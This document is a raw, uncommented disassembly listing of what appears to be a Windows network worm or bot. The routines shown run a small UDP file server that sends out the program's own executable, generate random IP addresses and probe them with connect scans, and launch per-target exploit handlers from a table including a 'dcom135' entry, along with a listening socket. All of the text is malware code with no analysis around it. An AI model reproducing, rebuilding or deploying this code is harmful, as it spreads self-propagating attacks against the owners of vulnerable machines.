lea eax, [ebp+var_D8]
push 80h
push eax
push edi
call dword_43C9FC ; recvfrom
push [ebp+var_28]
mov [ebp+var_C], eax
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_58]
push eax
call sub_415316
cmp [ebp+var_D8], bl
pop ecx
pop ecx
jnz loc_407007
cmp [ebp+var_D7], 1
jnz loc_406F59
lea eax, [ebp+var_274]
push eax
call sub_415B10
lea eax, [ebp+eax+var_D5]
mov [ebp+var_14], eax
lea eax, [ebp+var_274]
push eax
call sub_415B10
push eax
lea eax, [ebp+var_D6]
push eax
lea eax, [ebp+var_274]
push eax
call sub_416D70
add esp, 14h
test eax, eax
jnz loc_406F13
lea eax, [ebp+var_1C]
push eax
call sub_415B10
push eax
lea eax, [ebp+var_1C]
push [ebp+var_14]
push eax
call sub_416D70
add esp, 10h
test eax, eax
jnz loc_406F13
push ebx
push ebx
push [ebp+var_8]
call sub_416CDE
push [ebp+var_8]
lea eax, [ebp+var_57C]
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
push esi
push 1
push eax
mov [ebp+var_57E], bl
mov [ebp+var_57D], 1
call sub_416A57
add esp, 1Ch
lea ecx, [ebp+var_2C]
mov [ebp+var_C], eax
add eax, 4
push [ebp+var_4]
push ecx
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push edi
call dword_43CA88 ; sendto
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset unk_427268
loc_406EC7: ; CODE XREF: sub_406B84+47E�j
lea eax, [ebp+var_780]
push eax
call sub_415316
add esp, 10h
cmp [ebp+var_E0], ebx
jnz short loc_406F01
push ebx
lea eax, [ebp+var_780]
push [ebp+var_E4]
push eax
lea eax, [ebp+var_164]
push eax
push [ebp+var_37C]
call sub_412BD1
add esp, 14h
loc_406F01: ; CODE XREF: sub_406B84+358�j
lea eax, [ebp+var_780]
push eax
call sub_40B078
pop ecx
jmp loc_40701D
; ---------------------------------------------------------------------------
loc_406F13: ; CODE XREF: sub_406B84+2B6�j
; sub_406B84+2D7�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 13h
push offset dword_427254
push edi
call dword_43CA88 ; sendto
lea eax, [ebp+var_274]
push eax
lea eax, [ebp+var_58]
push eax
lea eax, [ebp+var_D8]
push offset unk_427218
push eax
call sub_415316
lea eax, [ebp+var_D8]
push eax
call sub_40B078
add esp, 14h
jmp loc_40701D
; ---------------------------------------------------------------------------
loc_406F59: ; CODE XREF: sub_406B84+275�j
cmp [ebp+var_D7], 4
jnz loc_407007
mov cl, [ebp+var_D5]
mov al, [ebp+var_D6]
cmp cl, 0FFh
mov [ebp+var_580], bl
mov [ebp+var_57F], 3
jnz short loc_406F90
inc al
xor cl, cl
mov [ebp+var_57D], bl
jmp short loc_406F98
; ---------------------------------------------------------------------------
loc_406F90: ; CODE XREF: sub_406B84+3FE�j
inc cl
mov [ebp+var_57D], cl
loc_406F98: ; CODE XREF: sub_406B84+40A�j
mov [ebp+var_57E], al
push ebx
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
shl eax, 9
sub eax, esi
push eax
push [ebp+var_8]
call sub_416CDE
push [ebp+var_8]
lea eax, [ebp+var_57C]
push esi
push 1
push eax
call sub_416A57
add esp, 1Ch
mov edi, eax
lea eax, [ebp+var_2C]
mov [ebp+var_C], edi
push [ebp+var_4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp+var_580]
push eax
push [ebp+var_10]
call dword_43CA88 ; sendto
cmp edi, ebx
jnz short loc_40701D
lea eax, [ebp+var_378]
push eax
lea eax, [ebp+var_58]
push eax
push offset dword_4271C8
jmp loc_406EC7
; ---------------------------------------------------------------------------
loc_407007: ; CODE XREF: sub_406B84+268�j
; sub_406B84+3DC�j
push [ebp+var_4]
lea eax, [ebp+var_2C]
push eax
push ebx
push 9
push offset dword_4271B8
push edi
call dword_43CA88 ; sendto
loc_40701D: ; CODE XREF: sub_406B84+204�j
; sub_406B84+38A�j ...
cmp [ebp+var_C], ebx
mov edi, [ebp+var_10]
jg loc_406D2F
loc_407029: ; CODE XREF: sub_406B84+1B4�j
push edi
call dword_43CABC ; closesocket
push [ebp+var_8]
call sub_415960
mov esi, [ebp+arg_0]
dec [ebp+var_16C]
pop ecx
cmp [esi+2A0h], ebx
jnz short loc_40705D
push [ebp+var_170]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_40705D: ; CODE XREF: sub_406B84+4C4�j
push 3E8h
call dword_421060 ; Sleep
push esi
loc_407069: ; CODE XREF: sub_406B84+123�j
call sub_406B84
pop edi
pop esi
pop ebx
leave
retn 4
sub_406B84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407075 proc near ; CODE XREF: sub_40CD3A+5753�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
loc_407078: ; DATA XREF: .text:00424DDC�o
; .text:00424DF0�o ...
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset unk_427728
push eax
xor ebx, ebx
call sub_415316
cmp dword_427388, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_4070E3
push esi
mov esi, offset dword_427390
loc_4070A8: ; CODE XREF: sub_407075+6B�j
mov eax, [esi]
add ebx, eax
push eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_415316
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_416DB0
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_4070A8
pop esi
loc_4070E3: ; CODE XREF: sub_407075+2B�j
push dword_46AE88
call sub_40A8CF
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_415316
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_416DB0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_200]
push eax
call sub_40B078
add esp, 38h
pop edi
pop ebx
leave
retn
sub_407075 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40713F proc near ; CODE XREF: sub_40CD3A+50A5�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_41501C
test eax, eax
pop ecx
jle short loc_40717B
mov eax, [ebp+arg_C]
push dword_43B678[eax*8]
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_427794
push eax
call sub_415316
add esp, 0Ch
jmp short loc_40718E
; ---------------------------------------------------------------------------
loc_40717B: ; CODE XREF: sub_40713F+13�j
lea eax, [ebp+var_200]
push offset unk_427760
push eax
call sub_415316
pop ecx
pop ecx
loc_40718E: ; CODE XREF: sub_40713F+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_412BD1
lea eax, [ebp+var_200]
push eax
call sub_40B078
add esp, 18h
leave
retn
sub_40713F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071B6 proc near ; CODE XREF: sub_4078DF+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_407534
imul eax, 3Ch
xor ebx, ebx
cmp dword_427394[eax], ebx
jz loc_407427
push 4
call sub_41501C
test eax, eax
pop ecx
jnz loc_407534
mov eax, dword_42C244
push edi
mov edi, offset dword_43BFF4
push 104h
push edi
push ebx
mov dword_43C204, eax
mov dword_43C200, ebx
call dword_42107C ; GetModuleFileNameA
push 103h
mov esi, offset dword_43C0F8
push offset byte_42C2B4
push esi
call sub_416BE0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_43BFF0, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_43C288, eax
jnz short loc_407266
lea eax, [ebp+arg_10]
push eax
push offset dword_43C208
call sub_416BE0
mov dword_43C28C, 1
jmp short loc_40727D
; ---------------------------------------------------------------------------
loc_407266: ; CODE XREF: sub_4071B6+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43C208
call sub_416BE0
mov dword_43C28C, ebx
loc_40727D: ; CODE XREF: sub_4071B6+AE�j
add esp, 0Ch
lea eax, [ebp+var_204]
push esi
push edi
push dword_43C204
push offset unk_427948
push eax
call sub_415316
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_414DDA
add esp, 20h
mov dword_43C1FC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43BFF0
push offset sub_406B84
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, dword_43C1FC
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz loc_40737C
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset unk_427900
push eax
call sub_415316
add esp, 0Ch
loc_4072FC: ; CODE XREF: sub_4071B6+1CE�j
lea eax, [ebp+var_204]
push eax
call sub_40B078
mov edi, offset dword_43C64C
mov [esp+210h+var_210], 104h
push edi
push ebx
mov dword_43C858, ebx
call dword_42107C ; GetModuleFileNameA
push 103h
mov esi, offset dword_43C750
push offset byte_42C2B4
push esi
call sub_416BE0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_43C648, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_43C8E0, eax
jnz short loc_407389
lea eax, [ebp+arg_10]
push eax
push offset dword_43C860
call sub_416BE0
mov dword_43C8E4, 1
jmp short loc_4073A0
; ---------------------------------------------------------------------------
loc_407374: ; CODE XREF: sub_4071B6+1CC�j
push 32h
call dword_421060 ; Sleep
loc_40737C: ; CODE XREF: sub_4071B6+125�j
cmp dword_43C290, ebx
jz short loc_407374
jmp loc_4072FC
; ---------------------------------------------------------------------------
loc_407389: ; CODE XREF: sub_4071B6+1A2�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43C860
call sub_416BE0
mov dword_43C8E4, ebx
loc_4073A0: ; CODE XREF: sub_4071B6+1BC�j
add esp, 0Ch
lea eax, [ebp+var_204]
push esi
push edi
push dword_43C85C
push offset dword_4278A8
push eax
call sub_415316
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_414DDA
add esp, 20h
mov dword_43C854, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43C648
push offset sub_405398
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, dword_43C854
pop edi
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_40741A
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset dword_427860
jmp loc_407518
; ---------------------------------------------------------------------------
loc_407412: ; CODE XREF: sub_4071B6+26A�j
push 32h
call dword_421060 ; Sleep
loc_40741A: ; CODE XREF: sub_4071B6+249�j
cmp dword_43C8E8, ebx
jz short loc_407412
jmp loc_407527
; ---------------------------------------------------------------------------
loc_407427: ; CODE XREF: sub_4071B6+25�j
cmp dword_427398[eax], ebx
jz loc_407534
push 3
call sub_41501C
test eax, eax
pop ecx
jnz loc_407534
mov esi, offset dword_43C524
push 104h
push esi
push ebx
call dword_42107C ; GetModuleFileNameA
push 5Ch
push esi
call sub_416EE0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_407465
mov [eax], bl
loc_407465: ; CODE XREF: sub_4071B6+2AB�j
mov eax, dword_42C248
mov dword_43C63C, ebx
mov dword_43C628, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_43C29C
call sub_415316
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_43C298, eax
mov ecx, [ebp+arg_138]
push esi
push dword_43C628
mov dword_43C634, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_43C638, ecx
call sub_40A08A
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_427810
push eax
call sub_415316
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_414DDA
add esp, 20h
mov dword_43C630, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43C298
push offset sub_405A96
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, dword_43C630
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_407540
call dword_421088 ; RtlGetLastWin32Error
push eax
push offset unk_4277C8
loc_407518: ; CODE XREF: sub_4071B6+257�j
lea eax, [ebp+var_204]
push eax
call sub_415316
add esp, 0Ch
loc_407527: ; CODE XREF: sub_4071B6+26C�j
; sub_4071B6+392�j
lea eax, [ebp+var_204]
push eax
call sub_40B078
pop ecx
loc_407534: ; CODE XREF: sub_4071B6+14�j
; sub_4071B6+35�j ...
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_407538: ; CODE XREF: sub_4071B6+390�j
push 32h
call dword_421060 ; Sleep
loc_407540: ; CODE XREF: sub_4071B6+354�j
cmp dword_43C644, ebx
jz short loc_407538
jmp short loc_407527
sub_4071B6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40754A proc near ; CODE XREF: sub_4076CB:loc_40772D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:43B678h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_4153F0
add esp, 0Ch
push [ebp+arg_0]
call dword_43C958 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_43CA20 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_4153F0
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_40754A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407592 proc near ; CODE XREF: sub_4076CB+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_415B10
cmp eax, 0Fh
pop ecx
jbe short loc_4075BA
xor eax, eax
jmp short loc_40762B
; ---------------------------------------------------------------------------
loc_4075BA: ; CODE XREF: sub_407592+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_416947
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_4075E7
call sub_415372
mov [ebp+var_C], eax
loc_4075E7: ; CODE XREF: sub_407592+4B�j
cmp [ebp+var_8], esi
jnz short loc_4075F4
call sub_415372
mov [ebp+var_8], eax
loc_4075F4: ; CODE XREF: sub_407592+58�j
cmp [ebp+var_4], esi
jnz short loc_407601
call sub_415372
mov [ebp+var_4], eax
loc_407601: ; CODE XREF: sub_407592+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_40760D
call sub_415372
loc_40760D: ; CODE XREF: sub_407592+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_43B678[ecx*8], eax
loc_40762B: ; CODE XREF: sub_407592+26�j
pop esi
leave
retn
sub_407592 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40762E proc near ; CODE XREF: sub_4076CB+A9�p
; sub_412A1D+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
inc edi
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_43CAA4 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_407657
xor eax, eax
jmp short loc_4076C6
; ---------------------------------------------------------------------------
loc_407657: ; CODE XREF: sub_40762E+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_43CA24 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_43CAC0 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_43C9CC ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_43CA0C ; select
push esi
mov edi, eax
call dword_43CABC ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_4076C6: ; CODE XREF: sub_40762E+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_40762E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076CB proc near ; DATA XREF: sub_4078DF+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
call dword_42104C ; GetTickCount
push eax
call sub_415368
mov ebx, esi
pop ecx
imul ebx, 234h
jmp loc_4078BC
; ---------------------------------------------------------------------------
loc_407717: ; CODE XREF: sub_4076CB+1FF�j
cmp [ebp+var_10], 0
push eax
jz short loc_40772D
lea eax, [ebp+var_150]
push eax
call sub_407592
pop ecx
jmp short loc_407732
; ---------------------------------------------------------------------------
loc_40772D: ; CODE XREF: sub_4076CB+51�j
call sub_40754A
loc_407732: ; CODE XREF: sub_4076CB+60�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_441B9C[ebx]
push [ebp+var_3C]
push edi
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_4279E8
push eax
call sub_415316
lea eax, [ebp+var_28C]
push eax
lea eax, dword_441998[ebx]
push eax
call sub_415316
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_40762E
add esp, 2Ch
cmp eax, 1
jnz loc_4078B1
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_407806
push offset dword_43BFD8
call dword_4210B4 ; RtlEnterCriticalSection
push [ebp+var_3C]
push edi
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_4279A8
push eax
call sub_415316
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4077E8
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_4077DC
lea eax, [ebp+var_140]
loc_4077DC: ; CODE XREF: sub_4076CB+109�j
push eax
push [ebp+var_40]
call sub_412BD1
add esp, 14h
loc_4077E8: ; CODE XREF: sub_4076CB+EE�j
lea eax, [ebp+var_28C]
push eax
call sub_40B078
mov [esp+2A8h+var_2A8], offset dword_43BFD8
call dword_4210B0 ; RtlLeaveCriticalSection
jmp loc_4078B1
; ---------------------------------------------------------------------------
loc_407806: ; CODE XREF: sub_4076CB+BE�j
push edi
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_415316
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aDcom135_0 ; "dcom135"
push eax
lea eax, [ebp+var_178]
push eax
call sub_415316
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_40784A
lea eax, [ebp+var_140]
loc_40784A: ; CODE XREF: sub_4076CB+177�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_415316
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call off_42738C[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_4078B1: ; CODE XREF: sub_4076CB+B4�j
; sub_4076CB+136�j
push 7D0h
call dword_421060 ; Sleep
loc_4078BC: ; CODE XREF: sub_4076CB+47�j
mov eax, dword_441B9C[ebx]
cmp dword_43B67C[eax*8], 0
jnz loc_407717
push esi
call sub_4150F0
pop ecx
push 0
call dword_421048 ; ExitThread
sub_4076CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078DF proc near ; DATA XREF: sub_40CD3A+3137�o
; sub_40CD3A+4D09�o
var_20C = dword ptr -20Ch
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_14C]
inc ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_43CA64 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_43B678[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_4071B6
push 8
call sub_41501C
add esp, 150h
cmp eax, ebx
jnz short loc_4079AD
mov esi, offset dword_43BFD8
push esi
call dword_4210BC ; RtlDeleteCriticalSection
push 80000400h
push esi
call dword_4210B8 ; InitializeCriticalSectionAndSpinCount
test eax, eax
jnz short loc_4079AD
lea eax, [ebp+var_1CC]
push offset unk_427B30
push eax
call sub_415316
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_407997
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_412BD1
add esp, 14h
loc_407997: ; CODE XREF: sub_4078DF+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_40B078
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4079AD: ; CODE XREF: sub_4078DF+63�j
; sub_4078DF+7F�j
mov eax, [ebp+var_2C]
mov esi, dword_421060
mov edi, ebx
mov dword_43B67C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_407A6F
loc_4079CB: ; CODE XREF: sub_4078DF+18A�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_427AE0
push eax
call sub_415316
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_414DDA
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_441B9C[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_4076CB
push ebx
push ebx
call dword_42108C ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_441BAC[ecx], eax
jnz short loc_407A86
call dword_421088 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset unk_427A90
push eax
call sub_415316
lea eax, [ebp+var_1CC]
push eax
call sub_40B078
add esp, 10h
loc_407A61: ; CODE XREF: sub_4078DF+1AC�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_4079CB
loc_407A6F: ; CODE XREF: sub_4078DF+E6�j
cmp [ebp+var_30], ebx
jz short loc_407A94
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_407AA1
; ---------------------------------------------------------------------------
loc_407A82: ; CODE XREF: sub_4078DF+1AA�j
push 1Eh
call esi ; Sleep
loc_407A86: ; CODE XREF: sub_4078DF+159�j
cmp [ebp+var_4], ebx
jz short loc_407A82
jmp short loc_407A61
; ---------------------------------------------------------------------------
loc_407A8D: ; CODE XREF: sub_4078DF+1C0�j
push 7D0h
call esi ; Sleep
loc_407A94: ; CODE XREF: sub_4078DF+193�j
mov eax, [ebp+var_2C]
cmp dword_43B67C[eax*8], 1
jz short loc_407A8D
loc_407AA1: ; CODE XREF: sub_4078DF+1A1�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_43B678[eax*8]
push eax
call dword_43CAB0 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_427A38
push eax
call sub_415316
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_407AEF
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_412BD1
add esp, 14h
loc_407AEF: ; CODE XREF: sub_4078DF+1F1�j
lea eax, [ebp+var_1CC]
push eax
call sub_40B078
mov eax, [ebp+var_2C]
mov [esp+20Ch+var_20C], 0BB8h
mov dword_43B67C[eax*8], ebx
call esi ; Sleep
push 8
call sub_41501C
cmp eax, 1
pop ecx
jnz short loc_407B26
push offset dword_43BFD8
call dword_4210BC ; RtlDeleteCriticalSection
loc_407B26: ; CODE XREF: sub_4078DF+23A�j
push [ebp+var_2C]
call sub_4150F0
pop ecx
push ebx
call dword_421048 ; ExitThread
sub_4078DF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_407B36 proc near ; DATA XREF: sub_40CD3A+3509�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
xor edi, edi
push 10h
inc edi
pop ebx
mov [eax+120h], edi
xor esi, esi
push ebx
lea eax, [ebp+var_10]
push esi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call dword_43CA24 ; ntohs
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call dword_43CAA4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407C99
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov dword_441BA4[eax], ebx
call dword_43C940 ; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_43CA50 ; bind
test eax, eax
jnz loc_407C99
push 0Ah
push ebx
call dword_43CA4C ; listen
test eax, eax
jnz loc_407C99
loc_407BE0: ; CODE XREF: sub_407B36+BE�j
; sub_407B36+15E�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call dword_43CAB8 ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_407BE0
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
